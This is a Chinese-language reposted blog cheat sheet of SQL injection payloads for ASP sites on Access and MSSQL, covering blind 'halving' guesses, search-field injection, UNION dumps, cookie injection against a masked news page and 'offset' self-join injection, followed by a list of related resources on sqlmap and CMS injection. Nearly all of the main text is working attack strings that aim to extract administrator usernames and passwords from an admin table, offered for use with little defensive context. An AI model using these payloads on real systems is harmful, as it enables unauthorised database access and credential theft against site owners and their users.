`
tiwson
  • 浏览: 333038 次
  • 性别: Icon_minigender_1
  • 来自: 广州
文章分类
社区版块
存档分类
最新评论

注入语句详解---get注入;搜索型注入;cookie注入等

 
阅读更多
注入语句详解

转自残鑫总结

注意:对于普通的get注入,如果是字符型,前加'   后加 and ''='
拆半法
######################################
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。
and exists (select * from admin)
and exists(select id from admin)
and exists(select id from admin where id=1)
and exists(select id from admin where id>1)
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
and exists (select username from admin)
and exists (select password from admin)
and exists (select id from admin where len(username)<10 and id=1)
and exists (select id from admin where len(username)>5 and id=1)
and exists (select id from admin where len(username)=6 and id=1)
and exists (select id from admin where len(password)<10 and id=1)
and exists (select id from admin where len(password)>5 and id=1)
and exists (select id from admin where len(password)=7 and id=1)
and (select top 1 asc(mid(username,1,1)) from admin)=97
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。
猜第二位把username,1,1改成username,2,1就可以了。
猜密码把username改成password就OK了
##################################################
搜索型注入
##################################
%' and 1=1 and '%'='
%' and exists (select * from admin) and '%'='
%' and exists(select id from admin where id=1) and '%'='
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='
对于MSSQL数据库,后面可以吧 and '%'='换成--
还有一点搜索型注入也可以使用union语句。
########################################################
联合查询。
#####################################
order by 10
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
###################################


cookie注入
###############################
http://www.******.com/shownews.asp?id=127
http://www.******.com/shownews.asp
alert(="id="+escape("127"));
alert(="id="+escape("127 and 1=1"));
alert(="id="+escape("127 order by 10"));
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
###################################

偏移注入
###########################################################
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
a.id=d.id)
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
分享到:
评论

相关推荐

    sqlmap注入详解文档

    ### SQLMap注入详解知识点 #### 一、SQLMap概述 - **定义与功能**:SQLMap是一款免费且开源的渗透测试工具,专为自动化检测和利用SQL注入漏洞而设计,并进一步接管数据库服务器。该工具拥有强大的检测引擎以及一...

    SQL注入详解

    ### SQL注入详解 #### 一、SQL注入概述 SQL注入是一种常见的网络安全攻击手段,它通过在应用程序接收的用户输入中嵌入恶意SQL代码,使这些输入成为SQL命令的一部分,在数据库服务器上被执行。这种攻击手段之所以...

    Sqlmap用法详解

    本文将详细解读Sqlmap的基础用法与高级技巧,包括如何利用Sqlmap进行GET和POST参数注入测试、处理Cookies中的注入、应对URL重写以及绕过WAF等技术细节。 #### 1. 基础用法介绍 - **列举数据库**:通过命令`./...

    [【原创】] FineCMS的注入和getshell1

    ### FineCMS注入与GetShell详解 #### 一、概述 FineCMS是一款基于PHP语言开发的内容管理系统(Content Management System, CMS),广泛应用于网站搭建和管理。本文将深入探讨在FineCMS中存在的SQL注入漏洞及其利用...

    SQLmap使用指令详解

    - **数据库特性识别**:如MySQL特有的注释注入等。 #### 六、HTTP请求配置 - **GET和POST方法**:支持使用HTTP GET和POST方法进行请求。 - **随机User-Agent**:可以从指定文件中随机选择User-Agent头。 - **...

    ASP防注入文件,放在CONN文件下

    ### ASP防注入技术详解 #### 一、概述 在当今高度信息化的社会中,Web应用程序的安全性变得尤为重要。SQL注入攻击是常见的安全威胁之一,它利用Web应用中的漏洞将恶意SQL命令插入到查询语句中执行,从而导致数据...

    sqlmap用户手册.pdf

    - **参数识别**:SQLMap能够自动检测并识别HTTP请求中的各种参数类型,包括GET参数、POST参数、HTTP Cookie参数等。 - **注入判断**:通过智能分析,SQLMap能判断哪些参数可能含有SQL注入漏洞。 ##### 2. 注入...

    基础web漏洞 by 鲨鱼.pdf

    - **数字型注入**:如 `SELECT * FROM users WHERE id=1`,在数字后面直接添加攻击语句。 - **字符型注入**:如 `SELECT * FROM users WHERE name='zs'`,在字符串后闭合引号,注释掉多余部分并插入攻击语句。 ####...

    Hacking Exposed Web2.0

    #### 知识点二:注入攻击详解 - **概念**:注入攻击是通过恶意数据输入来欺骗服务器执行非预期的命令或查询的一种手段。 - **类型**: - **SQL注入**:利用不安全的数据处理机制将恶意SQL语句插入到应用程序中。 -...

    考试hw.docx+信息安全问题汇总

    8. SQL注入中常用的函数/语句:包括字符串操作函数、数学函数、系统信息函数等,攻击者常利用它们进行信息探测或数据操纵。 9. SQL注入读取文件条件:数据库系统支持导入导出,且当前用户有文件操作权限。 10. ...

    php入门教程

    - 基本数据类型包括:整型(integer)、浮点型(float)、字符串(string)、布尔型(boolean)。 - 复合数据类型包括:数组(array)、对象(object)。 **2.2 控制结构** - **条件语句** - `if`, `else if`, `else`: 根据...

    PHP防范SQL注入的具体方法详解(测试通过)

    - 使用PDO或MySQLi扩展提供的预处理语句可以更有效地防止SQL注入。这些方法允许将变量与SQL语句分开处理,从而消除注入风险。例如,使用PDO: ```php $stmt = $pdo-&gt;prepare('SELECT * FROM article WHERE ...

Global site tag (gtag.js) - Google Analytics